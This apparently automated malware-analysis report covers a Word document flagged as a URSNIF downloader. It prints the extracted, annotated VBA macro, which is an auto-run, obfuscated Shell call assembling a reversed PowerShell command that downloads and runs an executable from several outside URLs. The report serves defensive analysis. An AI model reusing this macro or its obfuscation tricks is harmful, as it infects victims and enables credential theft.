Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca4670d0083c6a16…

MALICIOUS

Office (OLE)

Size: 75.0 KB · Created: 2018-09-11 17:07:00 · Authoring application: Microsoft Office Word · First seen: 2019-03-18
MD5: ca9f1443c8b32c7117d543afc674e703 SHA-1: 542ce5ca97bbe10b2e7b8265c80621a56f304d1c SHA-256: ca4670d0083c6a16ff9c12422ad00299481fbe0c77eb472f6dcb15f01a6f8d8a
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File), T1566.001 (Phishing: Spearphishing Attachment)

The sample is a malicious Office document containing a VBA macro that executes a Shell command. The macro attempts to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' and by the fact that the extracted macro assembles its command line at runtime from string fragments before passing it to Shell(). The Document_Open auto-execution entry point and the use of Shell() are strong indicators of malicious intent.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    A Shell() call was found in the VBA code. In this sample the command line is built at runtime from string fragments (see the extracted macro), so it does not appear as a literal anywhere in the document.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The VBA project defines a Document_Open handler, which Word runs automatically when the document is opened with macros enabled.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6257 bytes
SHA-256: 8b85b1ae6df68725ba8aee40f2989481f376ff129b4f581a36ec0376a37af824
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qQJzIvAOH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as emitted by the extractor for the first VBA module.
' VB_Base = "1Normal.ThisDocument" marks this as the document's ThisDocument
' class module, which is where Word looks for the Document_Open event handler
' defined below. VB_Name is an apparently randomised identifier rather than a
' descriptive name, like the other procedure and variable names in this project.
' Auto-run entry point. Word raises Document_Open when the document is opened
' with macros enabled, so this Sub runs without any further user action.
' (The name is spelled "Document_open" here; VBA procedure names are
' case-insensitive, so the event still binds.)
Private Sub Document_open()
' "On Error Resume Next", split across four lines with "_" continuations:
' every runtime error for the rest of the procedure is swallowed, so a failed
' Shell() call (or anything else) fails silently.
On _
Error _
Resume _
Next
   ' The VarType lines before and after the Shell call are padding: the
   ' result of VarType is discarded and the concatenated literals are never
   ' referenced again.
   VarType "108616445" + "XvtE" + "YtajNkLi" + "Ju"
   VarType "WKAi" + "2838"
   VarType "502" + "1893"
   VarType "8031" + "D"
   VarType "wtq" + "POR"
   VarType "Z" + "VwkqHz"
   VarType "545" + "263254937"
   VarType "420607815" + "EfAs"
' The only operative statement. The command line is built at runtime by
' concatenating the return values of Dcbdr() and aKjYIF() (both defined in
' the next module), so no command string exists as a literal in the document.
' Format(vbHide) yields "0", which Shell coerces to the vbHide window style:
' the spawned process runs with no visible window.
Shell Dcbdr + aKjYIF, Format(vbHide)
   VarType "ffnwLpqwZOBi" + "FILraYtwYGT" + "wzEjwp" + "264225734"
   VarType "YGNb" + "419890752"
   VarType "8208" + "531448503"
End Sub



Attribute VB_Name = "GnRtwtbzWpB"
' Second module (no VB_Base attribute, so presumably a standard module). It
' holds Dcbdr() and aKjYIF(), the two functions whose return values
' Document_open concatenates into the Shell command line.
' Returns the first part of the command line that Document_open passes to
' Shell. The string is never written as one literal: it is assembled from
' twelve fragment variables (lKFWOPncR .. wwFrRjLB), each itself a
' concatenation of short literals and Format(Chr(<sum>)) expressions, and the
' pieces are only joined in the assignment to Dcbdr near the end.
'
' Analyst notes:
'  * The Chr() arguments are sums of constants so the character never appears
'    in the source: 15+2+7+14+61 = 99 -> "c", 10+1+5+9+42 = 67 -> "C",
'    4+0+2+4+24 = 34 -> double quote. Format() applied to a one-character
'    string returns it unchanged. The first fragment therefore starts a
'    cmd.exe command line ("cmd /V:/C" followed by an opening double quote;
'    /V enables delayed environment-variable expansion).
'  * The many "^" characters are cmd.exe escape characters that cmd strips
'    while parsing; they defeat simple substring matching on the source and
'    are themselves a useful detection signal in this density.
'  * Several fragments contain scheme text written backwards (e.g. "p^tt^h",
'    "//:^p" + "tt" + "h^"), which suggests the assembled command reverses the
'    string before executing it. NOTE(review): confirm by decoding the full
'    command; the decoded content is deliberately not reproduced here.
'  * No Option Explicit or Dim is visible in this module, so every fragment
'    variable is an implicitly declared Variant.
'  * As in Document_open, the interleaved VarType lines are padding whose
'    results are discarded.
Function Dcbdr()

' "On Error Resume Next" split across four lines: all runtime errors in this
' function are silently ignored.
On _
Error _
Resume _
Next
VarType "tRt" + "341991959"
   VarType "1139" + "km" + "vfjisJZ" + "64982178"
' Fragment 1: the cmd.exe invocation and the start of a "set" statement.
lKFWOPncR = Format(Chr(15 + 2 + 7 + 14 + 61)) + "md /V" + ":/" + Format(Chr(10 + 1 + 5 + 9 + 42)) + Format(Chr(4 + 0 + 2 + 4 + 24)) + "s^" + "e^t S^8" + "=^   ^ " + " ^ ^ " + " " + "^   " + "  ^  ^ " + " ^}}{^h" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "^t^" + "a" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "}^;ka" + "er^b"
VarType "M" + "ifqXzaI" + "219639133" + "wbYr"
   VarType "RKhzAvcjz" + "zo" + "8987" + "5968"
' Fragments 2-12: further caret-padded pieces of the same command; see the
' header notes on the reversed scheme text in QumAtw, tYBQzOZh and zXXubLq.
irRUYQQ = "^" + ";" + "R" + "^hX" + "$ ^m^e" + "t" + "I-e" + "^kovnI^" + ";)R" + "^hX^" + "$^" + " " + "^,^qUs$"
VarType "v" + "1460" + "1761" + "U"
   VarType "aEvL" + "FbrviBwtzziiPD"
YaPsBV = "(el^i" + "^F^da^" + "ol" + "nwo^D" + "^.qti^" + "${yr"
VarType "75350078" + "3423"
   VarType "5846" + "4337"
   VarType "BaDiXUNO" + "26787437" + "491871598" + "zvTlkO"
   VarType "89337191" + "jZI"
LRfTWJi = "^t{)j" + Format(Chr(10 + 1 + 5 + 9 + 42)) + Format(Chr(10 + 1 + 5 + 9 + 42)) + "^$ n" + "^i^" + " q" + "U^s$(" + "h" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "ae" + "rof^;'e" + "^x" + "^e."
VarType "300716135" + "9908"
   VarType "925" + "hR" + "212" + "lQw"
WhpXiVl = "'+b" + Format(Chr(10 + 1 + 5 + 9 + 42)) + "N^" + "$" + "^+^'\'+" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "i^l^b^" + "u^p:vne" + "$^=" + "R^hX"
VarType "Ml" + "267889048" + "343655848" + "4952"
   VarType "zAuIzUV" + "lUI" + "Iz" + "3426"
ZYRlXli = "$^;^'^" + "61" + "^" + "9^'^ ^" + "= ^b" + Format(Chr(10 + 1 + 5 + 9 + 42)) + "N^$"
VarType "daNH" + "ZkpmhVsrCkLIU" + "pGI" + "ZiwzIVIzs"
   VarType "i" + "bfFa"
RFibwB = "^;)'" + "@'(t" + "i^l" + "pS^." + "'^E^7^e" + "^"
VarType "OJfow" + "506626630" + "47785217" + "YsCfjRIXTqqO"
   VarType "RYEAcZXM" + "285341926"
   VarType "ndzc" + "UihcioTY" + "515989082" + "110322693"
   VarType "mA" + "513168907"
LuBdpajiCjX = "Q" + "U^u" + "^e" + "/^e" + "t^"
VarType "168799218" + "Fz"
   VarType "6089" + "XN"
   VarType "H" + "iwjF"
QumAtw = "i^s^.a^" + "i" + "^l^i^h" + "p^eni" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "//^:p^" + "tth" + "@Xk^IN"
VarType "nAkw" + "4459"
   VarType "n" + "2856"
   VarType "I" + "ZHLz"
   VarType "WDPkvws" + "V"
tYBQzOZh = "fw2/m^" + "o" + Format(Chr(15 + 2 + 7 + 14 + 61)) + "^.w^-" + "88//:^p" + "tt" + "h^" + "@W^T4" + "h^I" + "^" + "Z^J^" + "O" + "OR/^se."
VarType "9450" + "JSMo"
   VarType "zOHFlBFof" + "vXHv" + "HtH" + "lQpp"
   VarType "8694" + "mDzEk"
   VarType "347548527" + "kJDwSrMYSLCpvK" + "OUHsqYwGEuiEP" + "5899"
zXXubLq = "p" + "o^h^" + "s^z^enu" + "t" + "na/" + "/:" + "p^tt^h" + "^@^T^2R"
VarType "57660975" + "ivA"
   VarType "w" + "251436741" + "118240006" + "ozWdjKZOjwz"
   VarType "9142" + "174330589" + "213844955" + "tJ"
wwFrRjLB = "^z" + "^I4p/" + "ur.nr^e" + "^" + "d"
' Join the fragments in declaration order. This is the only statement whose
' value leaves the function; everything after it is padding.
Dcbdr = lKFWOPncR + irRUYQQ + YaPsBV + LRfTWJi + WhpXiVl + ZYRlXli + RFibwB + LuBdpajiCjX + QumAtw + tYBQzOZh + zXXubLq + wwFrRjLB
   VarType "u" + "CwlBbbNkP"
   VarType "805" + "5984" + "wYvs" + "R"
   VarType "ajjCPTJa" + "7473"
   VarType "bwOo" + "5420" + "UZD" + "zcl"
End Function
Function aKjYIF()

On _
Error _
Resume _
Next
VarType "437446952" + "7346" + "221727816" + "jIBnuRbEKZDi"
   VarType "B" + "51797294" + "301085
... (truncated)